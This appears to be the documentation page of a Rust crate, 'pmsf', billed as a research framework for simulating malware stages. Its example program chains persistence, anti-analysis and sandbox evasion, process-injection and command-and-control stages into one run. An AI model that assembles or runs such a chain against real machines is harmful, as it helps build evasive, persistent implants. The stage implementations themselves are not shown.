pmsf 0.1.0

Polymorphic Malware Stage Framework (PMSF): a research-grade Rust framework for simulating and analyzing modular malware stages.
Documentation
use pmsf::{
    establish_persistence_poly, perform_anti_analysis_poly, execute_code_poly, communicate_c2_poly, FrameworkConfig
};
use std::fs;

fn main() {
    // Load configuration file
    let config: Option<FrameworkConfig> = fs::read_to_string("config.toml")
        .ok()
        .and_then(|content| toml::from_str(&content).ok());
    println!("Loaded config: {:?}", config);

    // Create a StageContext instance
    let ctx = pmsf::StageContext {
        payload: None,
        metadata: std::collections::HashMap::new(),
    };

    // Helper closures for selecting implementations by name
    fn select_persistence(name: &str) -> Box<dyn pmsf::PersistenceStage> {
        match name {
            "RegistryRunKeys" => Box::new(pmsf::RegistryRunKeys),
            "ScheduledTasks" => Box::new(pmsf::ScheduledTasks),
            "WMIEventSubscription" => Box::new(pmsf::WMIEventSubscription),
            _ => establish_persistence_poly(),
        }
    }
    fn select_execution(name: &str) -> Box<dyn pmsf::ExecutionStage> {
        match name {
            "ClassicProcessInjection" => Box::new(pmsf::ClassicProcessInjection),
            "MappingInjection" => Box::new(pmsf::MappingInjection),
            "ThreadHijacking" => Box::new(pmsf::ThreadHijacking),
            "DirectSyscallExecution" => Box::new(pmsf::DirectSyscallExecution),
            _ => execute_code_poly(),
        }
    }
    fn select_c2(name: &str) -> Box<dyn pmsf::C2Stage> {
        match name {
            "HTTPSCommunication" => Box::new(pmsf::HTTPSCommunication),
            "DNSTunneling" => Box::new(pmsf::DNSTunneling),
            "ICMPCommunication" => Box::new(pmsf::ICMPCommunication),
            "RawSocketsCommunication" => Box::new(pmsf::RawSocketsCommunication),
            _ => communicate_c2_poly(),
        }
    }
    fn select_anti_analysis(name: &str) -> Box<dyn pmsf::AntiAnalysisStage> {
        match name {
            "AntiDebugging" => Box::new(pmsf::AntiDebugging),
            "VMDetection" => Box::new(pmsf::VMDetection),
            "SandboxEvasion" => Box::new(pmsf::SandboxEvasion),
            _ => perform_anti_analysis_poly(),
        }
    }

    let persistence = config.as_ref()
        .and_then(|c| c.persistence.as_deref())
        .map(select_persistence)
        .unwrap_or_else(establish_persistence_poly);
    println!("Selected persistence: {}", std::any::type_name_of_val(&*persistence));
    persistence.establish_persistence(&ctx).unwrap();

    let anti_analysis = config.as_ref()
        .and_then(|c| c.anti_analysis.as_deref())
        .map(select_anti_analysis)
        .unwrap_or_else(perform_anti_analysis_poly);
    println!("Selected anti-analysis: {}", std::any::type_name_of_val(&*anti_analysis));
    anti_analysis.perform_anti_analysis(&ctx).unwrap();

    let execution = config.as_ref()
        .and_then(|c| c.execution.as_deref())
        .map(select_execution)
        .unwrap_or_else(execute_code_poly);
    println!("Selected execution: {}", std::any::type_name_of_val(&*execution));
    execution.execute_code(&ctx).unwrap();

    let c2 = config.as_ref()
        .and_then(|c| c.c2.as_deref())
        .map(select_c2)
        .unwrap_or_else(communicate_c2_poly);
    println!("Selected C2: {}", std::any::type_name_of_val(&*c2));
    c2.communicate_c2(&ctx).unwrap();
}